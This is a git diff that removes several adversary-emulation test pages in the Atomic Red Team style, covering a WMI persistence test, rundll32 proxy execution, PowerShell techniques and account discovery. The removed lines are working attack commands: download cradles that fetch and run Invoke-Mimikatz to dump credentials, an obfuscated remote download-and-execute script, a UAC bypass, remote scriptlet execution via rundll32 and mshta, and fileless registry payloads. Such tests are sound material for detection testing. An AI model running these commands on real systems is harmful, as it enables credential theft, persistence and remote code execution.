-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
-                EventNameSpace='root\CimV2';
-                QueryLanguage="WQL";
-                Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"};
-$Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs
-
-$ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
-                CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";}
-$Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs
-
-$FilterToConsumerArgs = @{
-Filter = [Ref] $Filter;
-Consumer = [Ref] $Consumer;
-}
-$FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs
-```
-
-#### Cleanup Commands:
-```powershell
-$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
-$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
-$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
-$FilterConsumerBindingToCleanup | Remove-WmiObject
-$EventConsumerToCleanup | Remove-WmiObject
-$EventFilterToCleanup | Remove-WmiObject
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1085.md b/Atomic_Threat_Coverage/Triggers/T1085.md
deleted file mode 100644
index 7997325..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1085.md
+++ /dev/null
@@ -1,260 +0,0 @@
-# T1085 - Rundll32
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1085)
-<blockquote>The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.
-
-Rundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)
-
-Rundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"</code>  This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Rundll32 execute JavaScript Remote Payload With GetObject](#atomic-test-1---rundll32-execute-javascript-remote-payload-with-getobject)
-
-- [Atomic Test #2 - Rundll32 execute VBscript command](#atomic-test-2---rundll32-execute-vbscript-command)
-
-- [Atomic Test #3 - Rundll32 advpack.dll Execution](#atomic-test-3---rundll32-advpackdll-execution)
-
-- [Atomic Test #4 - Rundll32 ieadvpack.dll Execution](#atomic-test-4---rundll32-ieadvpackdll-execution)
-
-- [Atomic Test #5 - Rundll32 syssetup.dll Execution](#atomic-test-5---rundll32-syssetupdll-execution)
-
-- [Atomic Test #6 - Rundll32 setupapi.dll Execution](#atomic-test-6---rundll32-setupapidll-execution)
-
-
-<br/>
-
-## Atomic Test #1 - Rundll32 execute JavaScript Remote Payload With GetObject
-Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_url | location of the payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/src/T1085.sct|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Rundll32 execute VBscript command
-Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test.
-Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/
-Upon execution calc.exe will be launched
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| command_to_execute | Command for rundll32.exe to execute | string | calc.exe|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0)
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Rundll32 advpack.dll Execution
-Test execution of a command using rundll32.exe with advpack.dll.
-Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Advpack.yml
-Upon execution calc.exe will be launched
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| inf_to_execute | Local location of inf file | string | PathToAtomicsFolder&#92;T1085&#92;src&#92;T1085.inf|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Inf file must exist on disk at specified location (#{inf_to_execute})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085.inf" -OutFile "#{inf_to_execute}"
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Rundll32 ieadvpack.dll Execution
-Test execution of a command using rundll32.exe with ieadvpack.dll.
-Upon execution calc.exe will be launched
-
-Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Ieadvpack.yml
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| inf_to_execute | Local location of inf file | string | PathToAtomicsFolder&#92;T1085&#92;src&#92;T1085.inf|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Inf file must exist on disk at specified location (#{inf_to_execute})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085.inf" -OutFile "#{inf_to_execute}"
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Rundll32 syssetup.dll Execution
-Test execution of a command using rundll32.exe with syssetup.dll. Upon execution, a window saying "installation failed" will be opened
-
-Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Syssetup.yml
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| inf_to_execute | Local location of inf file | string | PathToAtomicsFolder&#92;T1085&#92;src&#92;T1085_DefaultInstall.inf|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\#{inf_to_execute}
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Inf file must exist on disk at specified location (#{inf_to_execute})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085_DefaultInstall.inf" -OutFile "#{inf_to_execute}"
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - Rundll32 setupapi.dll Execution
-Test execution of a command using rundll32.exe with setupapi.dll. Upon execution, a windows saying "installation failed" will be opened
-
-Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Setupapi.yml
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| inf_to_execute | Local location of inf file | string | PathToAtomicsFolder&#92;T1085&#92;src&#92;T1085_DefaultInstall.inf|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\#{inf_to_execute}
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Inf file must exist on disk at specified location (#{inf_to_execute})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085_DefaultInstall.inf" -OutFile "#{inf_to_execute}"
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1086.md b/Atomic_Threat_Coverage/Triggers/T1086.md
deleted file mode 100644
index 9581630..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1086.md
+++ /dev/null
@@ -1,462 +0,0 @@
-# T1086 - PowerShell
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1086)
-<blockquote>PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. 
-
-PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.
-
-Administrator permissions are required to use PowerShell to connect to remote systems.
-
-A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363),  PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack)
-
-PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) (Citation: Microsoft PSfromCsharp APR 2014)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Mimikatz](#atomic-test-1---mimikatz)
-
-- [Atomic Test #2 - Run BloodHound from local disk](#atomic-test-2---run-bloodhound-from-local-disk)
-
-- [Atomic Test #3 - Run Bloodhound from Memory using Download Cradle](#atomic-test-3---run-bloodhound-from-memory-using-download-cradle)
-
-- [Atomic Test #4 - Obfuscation Tests](#atomic-test-4---obfuscation-tests)
-
-- [Atomic Test #5 - Mimikatz - Cradlecraft PsSendKeys](#atomic-test-5---mimikatz---cradlecraft-pssendkeys)
-
-- [Atomic Test #6 - Invoke-AppPathBypass](#atomic-test-6---invoke-apppathbypass)
-
-- [Atomic Test #7 - Powershell MsXml COM object - with prompt](#atomic-test-7---powershell-msxml-com-object---with-prompt)
-
-- [Atomic Test #8 - Powershell XML requests](#atomic-test-8---powershell-xml-requests)
-
-- [Atomic Test #9 - Powershell invoke mshta.exe download](#atomic-test-9---powershell-invoke-mshtaexe-download)
-
-- [Atomic Test #10 - Powershell Invoke-DownloadCradle](#atomic-test-10---powershell-invoke-downloadcradle)
-
-- [Atomic Test #11 - PowerShell Fileless Script Execution](#atomic-test-11---powershell-fileless-script-execution)
-
-- [Atomic Test #12 - PowerShell Downgrade Attack](#atomic-test-12---powershell-downgrade-attack)
-
-- [Atomic Test #13 - NTFS Alternate Data Stream Access](#atomic-test-13---ntfs-alternate-data-stream-access)
-
-
-<br/>
-
-## Atomic Test #1 - Mimikatz
-Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| mimurl | Mimikatz url | url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Run BloodHound from local disk
-Upon execution SharpHound will be downloaded to disk, imported and executed. It will set up collection methods, run and then compress and store the data to the temp directory on the machine. If system is unable to contact a domain, proper execution will not occur.
-
-Successful execution will produce stdout message stating "SharpHound Enumeration Completed". Upon completion, final output will be a *BloodHound.zip file.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_path | File path for SharpHound payload | String | PathToAtomicsFolder&#92;T1086&#92;src|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-write-host "Import and Execution of SharpHound.ps1 from #{file_path}" -ForegroundColor Cyan
-import-module #{file_path}\SharpHound.ps1
-Invoke-BloodHound -OutputDirectory $env:Temp
-Start-Sleep 5
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-Item #{file_path}\SharpHound.ps1 -Force -ErrorAction Ignore
-Remove-Item $env:Temp\*BloodHound.zip -Force
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: SharpHound.ps1 must be located at #{file_path}
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "#{file_path}\SharpHound.ps1"
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Run Bloodhound from Memory using Download Cradle
-Upon execution SharpHound will load into memory and execute against a domain. It will set up collection methods, run and then compress and store the data to the temp directory. If system is unable to contact a domain, proper execution will not occur.
-
-Successful execution will produce stdout message stating "SharpHound Enumeration Completed". Upon completion, final output will be a *BloodHound.zip file.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
-IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
-Invoke-BloodHound -OutputDirectory $env:Temp
-Start-Sleep 5
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-Item $env:Temp\*BloodHound.zip -Force
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Obfuscation Tests
-Different obfuscated methods to test. Upon execution, reaches out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION"
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))
-(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()
-Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Mimikatz - Cradlecraft PsSendKeys
-Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - Invoke-AppPathBypass
-Note: Windows 10 only. Upon execution windows backup and restore window will be opened.
-
-Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #7 - Powershell MsXml COM object - with prompt
-Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed.
-
-Provided by https://github.com/mgreen27/mgreen27.github.io
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/test.ps1|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #8 - Powershell XML requests
-Powershell xml download request. Upon execution, "Download Cradle test success!" will be dispalyed.
-
-Provided by https://github.com/mgreen27/mgreen27.github.io
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/test.xml|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #9 - Powershell invoke mshta.exe download
-Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display "Download Cradle test success!".
-
-Provided by https://github.com/mgreen27/mgreen27.github.io
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/mshta.sct|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #10 - Powershell Invoke-DownloadCradle
-Provided by https://github.com/mgreen27/mgreen27.github.io
-Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Run it with these steps! 
-1. Open Powershell_ise as a Privileged Account
-2. Invoke-DownloadCradle.ps1
-
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #11 - PowerShell Fileless Script Execution
-Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. Upon exection, open "C:\Windows\Temp" and verify that
-art-marker.txt is in the folder.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
-reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI="
-iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-Item -path C:\Windows\Temp\art-marker.txt -Force -ErrorAction Ignore
-Remove-Item HKCU:\Software\Classes\AtomicRedTeam -Force -ErrorAction Ignore
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #12 - PowerShell Downgrade Attack
-This test requires the manual installation of PowerShell V2.
-
-Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-powershell.exe -version 2 -Command Write-Host $PSVersion
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: PowerShell version 2 must be installed
-##### Check Prereq Commands:
-```powershell
-if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-Write-Host  Automated installer not implemented yet, please install PowerShell v2 manually
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #13 - NTFS Alternate Data Stream Access
-Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| ads_file | File created to store Alternate Stream Data | String | $env:TEMP&#92;NTFS_ADS.txt|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
-$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
-Invoke-Expression $streamcommand
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-Item #{ads_file} -Force -ErrorAction Ignore
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Homedrive must be an NTFS drive
-##### Check Prereq Commands:
-```powershell
-if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-Write-Host Prereq's for this test cannot be met automatically
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1087.md b/Atomic_Threat_Coverage/Triggers/T1087.md
deleted file mode 100644
index 00f839a..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1087.md
+++ /dev/null
@@ -1,388 +0,0 @@
-# T1087 - Account Discovery
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1087)
-<blockquote>Adversaries may attempt to get a listing of local system or domain accounts. 
-
-### Windows
-
-Example commands that can acquire this information are <code>net user</code>, <code>net group <groupname></code>, and <code>net localgroup <groupname></code> using the [Net](https://attack.mitre.org/software/S0039) utility or through use of [dsquery](https://attack.mitre.org/software/S0105). If adversaries attempt to identify the primary user, currently logged in user, or set of users that commonly uses a system, [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) may apply.
-
-### Mac
-
-On Mac, groups can be enumerated through the <code>groups</code> and <code>id</code> commands. In mac specifically, <code>dscl . list /Groups</code> and <code>dscacheutil -q group</code> can also be used to enumerate groups and users.
-
-### Linux
-
-On Linux, local users can be enumerated through the use of the <code>/etc/passwd</code> file which is world readable. In mac, this same file is only used in single-user mode in addition to the <code>/etc/master.passwd</code> file.
-
-Also, groups can be enumerated through the <code>groups</code> and <code>id</code> commands.
-
-### Office 365 and Azure AD
-
-With authenticated access there are several tools that can be used to find accounts. The <code>Get-MsolRoleMember</code> PowerShell cmdlet can be used to obtain account names given a role or permissions group.(Citation: Microsoft msolrolemember)(Citation: GitHub Raindance)
-
-Azure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command <code>az ad user list</code> will list all users within a domain.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018) 
-
-The <code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Enumerate all accounts](#atomic-test-1---enumerate-all-accounts)
-
-- [Atomic Test #2 - View sudoers access](#atomic-test-2---view-sudoers-access)
-
-- [Atomic Test #3 - View accounts with UID 0](#atomic-test-3---view-accounts-with-uid-0)
-
-- [Atomic Test #4 - List opened files by user](#atomic-test-4---list-opened-files-by-user)
-
-- [Atomic Test #5 - Show if a user account has ever logged in remotely](#atomic-test-5---show-if-a-user-account-has-ever-logged-in-remotely)
-
-- [Atomic Test #6 - Enumerate users and groups](#atomic-test-6---enumerate-users-and-groups)
-
-- [Atomic Test #7 - Enumerate users and groups](#atomic-test-7---enumerate-users-and-groups)
-
-- [Atomic Test #8 - Enumerate all accounts](#atomic-test-8---enumerate-all-accounts)
-
-- [Atomic Test #9 - Enumerate all accounts via PowerShell](#atomic-test-9---enumerate-all-accounts-via-powershell)
-
-- [Atomic Test #10 - Enumerate logged on users via CMD](#atomic-test-10---enumerate-logged-on-users-via-cmd)
-
-- [Atomic Test #11 - Enumerate logged on users via PowerShell](#atomic-test-11---enumerate-logged-on-users-via-powershell)
-
-
-<br/>
-
-## Atomic Test #1 - Enumerate all accounts
-Enumerate all accounts by copying /etc/passwd to another file
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| output_file | Path where captured results will be placed | Path | /tmp/T1087.txt|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-cat /etc/passwd > #{output_file}
-cat #{output_file}
-```
-
-#### Cleanup Commands:
-```sh
-rm -f #{output_file}
-```
-
-
-
-
-
-<br/>
-<br/>
-
